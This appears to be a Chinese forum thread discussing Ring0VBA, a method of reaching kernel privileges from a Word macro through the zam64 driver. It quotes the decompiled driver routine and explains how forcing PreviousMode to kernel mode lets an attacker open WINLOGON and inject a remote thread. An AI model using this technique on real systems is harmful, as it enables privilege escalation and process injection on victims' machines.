Ring0VBA - Getting Ring0 Using a Goddamn Word Document

显示全部楼层 · 发表于 2022-10-25 10:27:48

https://disrel.com/posts/Ring0VB ... damn-Word-Document/

https://github.com/DISREL/Ring0VBA

显示全部楼层 · 发表于 2022-10-25 11:42:12

NTSTATUS __fastcall ZmnHmZwOpenProcess(void **a1, ACCESS_MASK a2, struct _OBJECT_ATTRIBUTES *a3, struct _CLIENT_ID *a4)
{
  __int64 v4; // rcx
  NTSTATUS result; // eax
  KPROCESSOR_MODE v6; // [rsp+30h] [rbp-18h]
  NTSTATUS v7; // [rsp+34h] [rbp-14h]

  v6 = ExGetPreviousMode();
  if ( (unsigned int)ZmnHmKeSetPreviousMode(0i64) )
  {
DnsPrint_RpcZoneInfo(
   1,
   (unsigned int)"HookManager\\HookManager.c",
   1360,
   (unsigned int)"ZmnHmZwOpenProcess",
   0,
   "ZmnHmZwOpenProcess calling Nt* routine");
v7 = NtOpenProcess(a1, a2, a3, a4);
LOBYTE(v4) = v6;
ZmnHmKeSetPreviousMode(v4);
result = v7;
  }
  else
  {
DnsPrint_RpcZoneInfo(
   1,
   (unsigned int)"HookManager\\HookManager.c",
   1370,
   (unsigned int)"ZmnHmZwOpenProcess",
   0,
   "ZmnHmZwOpenProcess calling Zw* routine");
result = ZwOpenProcess(a1, a2, a3, a4);
  }
  return result;
}
看了下将ETHREAD里的PreviousMode强行设为0的内核模式，来绕过一些保护，打开WINLOGON进程句柄，然后创建远线程做事。

显示全部楼层 · 发表于 2022-10-25 12:03:16

zam64啊？这个驱动最近大手子已经公开了，但是是外{过}{滤}挂

不过从word日出去还是挺抽象的

[其他相关] Ring0VBA - Getting Ring0 Using a Goddamn Word Document

浏览过的版块